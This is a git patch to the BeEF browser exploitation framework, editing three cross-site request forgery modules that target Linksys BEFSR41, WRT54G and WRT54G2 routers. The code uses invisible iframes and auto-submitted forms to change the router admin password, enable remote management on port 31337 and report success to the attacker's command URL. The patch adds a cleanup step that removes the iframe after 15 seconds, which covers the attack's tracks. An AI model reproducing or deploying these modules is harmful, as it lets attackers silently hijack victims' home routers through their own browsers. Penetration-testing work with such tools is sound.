From 5c678a2550c0fa64f0d94038f6272de84e7ee760 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 3 Mar 2012 20:43:56 +1030
Subject: [PATCH] Added cleanup() function to router exploits

Removed `username:password@` portion of example target URLs as
unfortunately this triggers warnings in most modern browsers. The
modules target CSRF vulnerabilities and it's expected and
acceptable behaviour to rely on the user having an authorized session by
default.

"Advanced users" will be familiar with the `username:password@` trick
and can add it to the URL if they desire.
---
 modules/router/linksys_befsr41_csrf/command.js | 12 ++++++++++--
 modules/router/linksys_befsr41_csrf/module.rb  |  2 +-
 modules/router/linksys_wrt54g2_csrf/command.js | 11 +++++++++--
 modules/router/linksys_wrt54g2_csrf/module.rb  |  2 +-
 modules/router/linksys_wrt54g_csrf/command.js  | 11 +++++++++--
 modules/router/linksys_wrt54g_csrf/module.rb   |  2 +-
 6 files changed, 31 insertions(+), 9 deletions(-)

diff --git a/modules/router/linksys_befsr41_csrf/command.js b/modules/router/linksys_befsr41_csrf/command.js
index dca74aa47..cb7d19eb5 100644
--- a/modules/router/linksys_befsr41_csrf/command.js
+++ b/modules/router/linksys_befsr41_csrf/command.js
@@ -14,7 +14,15 @@
 //   limitations under the License.
 //
 beef.execute(function() {
-  var iframe = beef.dom.createInvisibleIframe();
-  iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+
+  var befsr41_iframe = beef.dom.createInvisibleIframe();
+  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(befsr41_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+
diff --git a/modules/router/linksys_befsr41_csrf/module.rb b/modules/router/linksys_befsr41_csrf/module.rb
index 0d0684ac5..40dcaa4dc 100644
--- a/modules/router/linksys_befsr41_csrf/module.rb
+++ b/modules/router/linksys_befsr41_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_befsr41_csrf < BeEF::Core::Command
   
   def self.options
     return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
         {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
         {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
     ]
diff --git a/modules/router/linksys_wrt54g2_csrf/command.js b/modules/router/linksys_wrt54g2_csrf/command.js
index f98992afb..036a25aab 100644
--- a/modules/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/router/linksys_wrt54g2_csrf/command.js
@@ -20,7 +20,7 @@ beef.execute(function() {
 
   var target = gateway + "Manage.tri";
 
-  var iframe = beef.dom.createInvisibleIframe();
+  var wrt54g2_iframe = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
   input.setAttribute('value', 'en');
   form.appendChild(input);
 
-  iframe.contentWindow.document.body.appendChild(form);
+  wrt54g2_iframe.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wrt54g2_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+
diff --git a/modules/router/linksys_wrt54g2_csrf/module.rb b/modules/router/linksys_wrt54g2_csrf/module.rb
index 7f0325e7d..94f5d6ed0 100644
--- a/modules/router/linksys_wrt54g2_csrf/module.rb
+++ b/modules/router/linksys_wrt54g2_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_wrt54g2_csrf < BeEF::Core::Command
   
   def self.options
     return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
         {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
         {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
     ]
diff --git a/modules/router/linksys_wrt54g_csrf/command.js b/modules/router/linksys_wrt54g_csrf/command.js
index 55a5bf747..456922d35 100644
--- a/modules/router/linksys_wrt54g_csrf/command.js
+++ b/modules/router/linksys_wrt54g_csrf/command.js
@@ -20,7 +20,7 @@ beef.execute(function() {
 
   var target = gateway + "manage.tri";
 
-  var iframe = beef.dom.createInvisibleIframe();
+  var wrt54g_iframe = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
   input.setAttribute('value', 'en');
   form.appendChild(input);
 
-  iframe.contentWindow.document.body.appendChild(form);
+  wrt54g_iframe.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wrt54g_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+
diff --git a/modules/router/linksys_wrt54g_csrf/module.rb b/modules/router/linksys_wrt54g_csrf/module.rb
index 2d1b45f2c..47ee87039 100644
--- a/modules/router/linksys_wrt54g_csrf/module.rb
+++ b/modules/router/linksys_wrt54g_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_wrt54g_csrf < BeEF::Core::Command
   
   def self.options
     return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
         {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
         {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
     ]